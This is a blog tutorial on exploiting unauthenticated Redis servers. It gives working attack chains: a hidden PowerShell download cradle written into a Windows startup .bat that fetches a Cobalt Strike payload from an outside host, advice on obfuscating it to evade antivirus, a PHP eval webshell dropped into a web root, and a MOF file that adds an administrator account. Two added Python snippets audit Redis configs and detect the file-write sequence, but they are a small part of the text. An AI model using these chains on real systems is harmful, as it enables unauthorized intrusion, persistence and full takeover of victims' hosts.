Hardcore resources! Exploiting the Redis unauthorized access vulnerability (detailed illustrated explanation)

The previous article shared "SpringMVC-RequestMappingHandlerMapping"; this article shares "Utilizing the Redis Unauthorized Access Vulnerability".

0x00 Principle

First, some background: Redis is a non-relational (key-value) database. By default it binds to 0.0.0.0:6379. If no protective measures are taken, such as firewall rules that block access from untrusted IPs, the Redis service is exposed to the public network. If no password authentication is configured, anyone can access Redis without authorization and read its data. An attacker can abuse the config command provided by Redis to write files: writing their own SSH public key into authorized_keys in the target server's /root/.ssh folder, then logging in to the target over SSH with the matching private key.

0x01 Vulnerability point

  • Redis is bound to 0.0.0.0:6379, with no firewall rules or other security policies to block access from untrusted source IPs, so it is exposed directly to the public network.
  • No password authentication is configured (the password is usually empty), so the Redis service can be logged into remotely without a password.
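As an added example (not part of the original post), here is a small Python audit of a redis.conf for exactly these two conditions, plus the settings that would block the CONFIG SET dir/dbfilename file write used later in the post. The sample configs are constructed and the finding codes are my own naming.

```python
# Added example (not from the original post): audit redis.conf for the
# 0x01 conditions and for settings that block CONFIG SET dir/dbfilename.
def parse_redis_conf(text):
    """Map each directive (lowercased) to the list of values it was given."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            parts = line.split(None, 1)
            conf.setdefault(parts[0].lower(), []).append(parts[1] if len(parts) > 1 else "")
    return conf

def listens_on_all_interfaces(bind_values):
    if not bind_values:            # no bind directive: every interface
        return True
    for value in bind_values:
        for addr in value.split():
            addr = addr.lstrip("-")  # "-::1" means "optional ::1"
            if addr in ("0.0.0.0", "::") or addr.startswith("*"):
                return True
    return False

def audit_redis_conf(text):
    """Return weakness codes (my own naming) in a fixed order."""
    conf = parse_redis_conf(text)
    findings = []
    if listens_on_all_interfaces(conf.get("bind", [])):
        findings.append("bind-all-interfaces")
    if not conf.get("requirepass", [""])[-1].strip().strip('"'):
        findings.append("no-requirepass")
    if conf.get("protected-mode", ["yes"])[-1].lower() == "no":
        findings.append("protected-mode-off")
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()}
    if "CONFIG" not in renamed:
        findings.append("config-command-enabled")
    if conf.get("enable-protected-configs", ["no"])[-1].lower() == "yes":
        findings.append("protected-configs-enabled")   # Redis 7+ guard re-opened
    return findings

# Constructed samples: the exposed default beside a hardened version.
WEAK_CONF = "bind 0.0.0.0\nprotected-mode no\n"
HARDENED_CONF = """bind 127.0.0.1 -::1
protected-mode yes
requirepass REPLACE_WITH_A_LONG_RANDOM_SECRET
rename-command CONFIG ""
rename-command FLUSHALL ""
"""
```

Renaming CONFIG to an empty string disables it entirely, which is the most direct way to remove the file-write primitive this post relies on.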

0x02 Hazard

  • Attackers can access internal data without authentication, which may leak sensitive information. They can also maliciously run flushall to wipe all data.
  • Attackers can execute Lua code through EVAL, or write backdoor files to disk through the data backup (RDB dump) function.
  • In the most serious case, if Redis is running as root, the attacker can write an SSH public key file for the root account and log in to the victim server directly over SSH.
  • The result is direct remote control of the target host.

0x03 Vulnerability PoC

Assume that 192.168.242.134 may have a Redis unauthorized access vulnerability.

The usual first step is a scan with the nmap script:
  • nmap -p 6379 --script redis-info 192.168.242.134

If the scan shows that port 6379 on the host is open to the external network, it is reasonable to assume a Redis database is running there. If it also has the default configuration with an empty password and is reachable from the Internet, you can connect to it directly with ./redis-cli -h 192.168.242.134 from another VPS that has redis-cli installed.

View sensitive information:

  • redis 192.168.242.134:6379> info

0x04 Vulnerability EXP

0x04.1 Writing a startup item

Under Linux, a foothold is usually obtained by writing a scheduled task (cron job), but here we discuss exploitation under Windows.
The Windows startup directory is:

C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/

Configure a listener on CS (Cobalt Strike).

Generate the payload:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://129.xxx:80/a'))"

Note that when the target is on a public IP or reached through intranet penetration, the download may not succeed.
If anti-virus software is present, you can try obfuscating the PowerShell code to evade it.

Configuration after connecting to Redis:

config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/"
+OK
config set dbfilename 1.bat
+OK
set x "\r\n\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://129.xxx:80/a'))\"\r\n\r\n"
+OK
save
+OK

Briefly: through config set, Redis is made to generate 1.bat in the startup directory, and our PowerShell remote-download stager is written into that file by save. As soon as the computer restarts, 1.bat runs automatically.

0x04.2 Writing a webshell

Following the pattern summarized above, exploiting Redis unauthorized access generally works by writing a file and then establishing a connection between the target machine and us. So if we know the absolute path of the target website, we can write a one-line webshell into one of the site's directories and then connect to it with a webshell management tool.
After connecting to the target Redis:

192.168.1.103:6379> CONFIG SET dir c:/phpstudy_pro/WWW
OK
192.168.1.103:6379> CONFIG SET dbfilename shell.php
OK
192.168.1.103:6379> set x "php @eval($_POST['hack']) ?>"
OK
192.168.1.103:6379> save
OK

Then connect directly with AntSword.

0x04.3 MOF privilege escalation

MOF (Managed Object Format) is a Windows system file type; the file of interest is c:/windows/system32/wbem/mof/nullevt.mof, whose role is to monitor the creation and termination of processes every 5 seconds. The simple form of MOF privilege escalation is to write a malicious MOF file into that folder; part of it is a VBS script, and most of that script is a cmd command that adds an administrator user. Once written, the file is executed by the server with SYSTEM privileges every 5 seconds. (This default execution every 5 seconds only applies to Windows Server 2003 and earlier.)

Condition

  • Windows Server 2003

MOF code:

#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net user admin admin /add\")";
};
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};

Format it as shown in the picture.

Save the MOF code as ceshi.txt, then generate shell.txt by writing the contents of ceshi.txt into it, padded with blank lines on both sides:

(echo -e "\n\n"; cat ceshi.txt; echo -e "\n\n") > shell.txt

Payload after connecting to Redis

Pipe the contents of shell.txt into the target Redis through redis-cli so it is stored as the value of key x, then set the directory and file name and save:

  • cat /root/shell.txt | ./redis-cli -h 192.168.1.104 -x set x
  • CONFIG SET dir C:/windows/system32/wbem/mof/
  • CONFIG SET dbfilename shell.mof
  • save

Refer to the picture for the configuration.

After about 5 seconds, the MOF script is executed automatically. Compared with the other two methods, which require a reboot or knowledge of the website's absolute path, this condition is relatively easy to meet.
After the script runs, a new user can be found on the target host, so we can connect to it remotely.
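All three techniques in 0x04 issue the same sequence of Redis commands: CONFIG SET dir, CONFIG SET dbfilename, SET, then SAVE. As an added example (not part of the original post), this Python snippet detects that sequence in Redis MONITOR output; the sample lines are constructed and the client addresses are placeholders.

```python
# Added example (not from the original post): detect the CONFIG SET dir /
# CONFIG SET dbfilename / SAVE sequence from 0x04 in Redis MONITOR output.
import re

MONITOR_LINE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.*)$')
QUOTED_ARG = re.compile(r'"((?:\\.|[^"\\])*)"')

def parse_monitor_line(line):
    """Return (client, [command, args...]) or None for a non-MONITOR line."""
    m = MONITOR_LINE.match(line.strip())
    if not m:
        return None
    args = QUOTED_ARG.findall(m["args"])
    return (m["client"], args) if args else None

def detect_rdb_file_writes(lines):
    """Flag clients that redirect the RDB dump and then force a SAVE."""
    redirected = {}   # client -> {"dir": ..., "dbfilename": ...}
    alerts = []
    for line in lines:
        parsed = parse_monitor_line(line)
        if not parsed:
            continue
        client, args = parsed
        cmd = args[0].lower()
        if cmd == "config" and len(args) >= 4 and args[1].lower() == "set" \
                and args[2].lower() in ("dir", "dbfilename"):
            redirected.setdefault(client, {})[args[2].lower()] = args[3]
        elif cmd in ("save", "bgsave") and client in redirected:
            target = redirected[client]
            name = target.get("dbfilename", "dump.rdb")
            alerts.append({
                "client": client,
                "dir": target.get("dir"),
                "dbfilename": target.get("dbfilename"),
                # A dump that is not *.rdb is almost always a planted file.
                "suspicious_name": not name.lower().endswith(".rdb"),
            })
    return alerts

# Constructed MONITOR lines mirroring the 0x04.1 chain; addresses are placeholders.
SAMPLE_MONITOR = r'''
1700000000.200000 [0 203.0.113.10:51234] "config" "set" "dir" "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/"
1700000000.300000 [0 203.0.113.10:51234] "config" "set" "dbfilename" "1.bat"
1700000000.400000 [0 203.0.113.10:51234] "set" "x" "\r\n\r\n<payload omitted>\r\n\r\n"
1700000000.500000 [0 203.0.113.10:51234] "save"
1700000000.600000 [0 10.0.0.5:40000] "set" "session:1" "ok"
1700000000.700000 [0 10.0.0.5:40000] "save"
'''.strip().splitlines()
```

MONITOR is expensive on a busy instance, so in practice the same per-client state machine is better fed from a proxy or audit log; the point is the pairing of a redirected dump with a forced SAVE, not any single command.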

  • That concludes this sharing of "Utilizing the Redis Unauthorized Access Vulnerability".
  • Everyone is welcome to exchange ideas and discuss; if there are any errors in this article, I hope you will forgive me.
  • Creating content is not easy; your support is my biggest motivation. If this helped you, please give it a thumbs up~~~